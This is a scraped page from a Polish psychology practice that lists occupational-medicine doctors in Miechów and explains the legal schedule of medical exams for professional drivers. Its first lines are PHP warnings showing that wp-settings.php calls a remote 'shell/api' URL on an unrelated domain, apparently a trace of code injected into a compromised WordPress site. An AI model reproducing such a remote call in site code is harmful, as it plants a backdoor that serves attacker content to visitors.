Warning: file_get_contents() [function.file-get-contents]: php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/appslabs/domains/pracownialegacy.pl/public_html/wp-settings.php on line 252

Warning: file_get_contents(http://www.richubaidan.info/server/manager/shell/api/url.php?url=/badania-lekarskie/&domain=pracownialegacy.pl) [function.file-get-contents]: failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/appslabs/domains/pracownialegacy.pl/public_html/wp-settings.php on line 252
Badania lekarskie | Legacy – Pracownia Psychologiczna

Lekarze medycyny pracy współpracujący z Legacy

 • GOZ w Miechowie

 • (41) 38-20-297

 • lek.med. R. SIUDAK, lek.med. B. ŚLIWOŃ
 • 32-200 Miechów, ul. Szpitalna 3.
 • Gabinet Prywatny

 • 511 550 058

 • lek.med. Bożenna ŚLIWOŃ
 • 32-200 Miechów, Walki Zbrojnej 1
 • Publiczny Zaklad Opieki Zdrowotnej

 • (41) 383-60-08

 • 32-250 Charsznica, ul. Miechowska 52
 • Centrum Medyczne TOP-MED

 • (41) 38-333-22

 • NZOZ Centrum Medyczne TOP-MED
 • 32-200 Miechów, ul. Piłsudskiego 12

Badania lekarskie kierowców zawodowych wykonujących przewóz drogowy do kwalifikacji wstępnej lub szkolenia okresowego

 • Kierowca wykonujący przewóz drogowy podlega badaniom lekarskim przeprowadzanym w celu stwierdzenia istnienia lub braku przeciwwskazań zdrowotnych do wykonywania pracy na stanowisku kierowcy. Badania lekarskie są wykonywane, z zastrzeżeniem w zakresie i na zasadach określonych w przepisach ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (Dz. U. z 1998 r. Nr 21, poz. 94, z późn. zm.), zwanej dalej „Kodeksem pracy". Zakres badań lekarskich obejmuje ponadto ustalenie istnienia lub braku przeciwwskazań zdrowotnych do kierowania pojazdami, zgodnie z ustawą z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym.
 • Badania lekarskie są przeprowadzane:
  -  do czasu ukończenia przez kierowcę 60 lat - co 5 lat;

-  po ukończeniu przez kierowcę 60 roku życia - co 30 miesięcy.

 • Pierwsze badanie lekarskie kierowca ma obowiązek wykonać przed dniem wydania świadectwa kwalifikacji zawodowej potwierdzającego ukończenie kwalifikacji, a każde następne dla kierowcy w wieku do 60 lat - w terminie właściwym do ukończenia szkolenia okresowego, jednak nie później niż do dnia wydania świadectwa kwalifikacji zawodowej potwierdzającego ukończenie szkolenia okresowego.
  Badania lekarskie wykonują lekarze uprawnieni do wykonywania badań profilaktycznych, o których mowa w przepisach Kodeksu pracy, posiadający dodatkowo uprawnienia do przeprowadzania badań lekarskich kandydatów na kierowców i kierowców określone w odrębnych przepisach.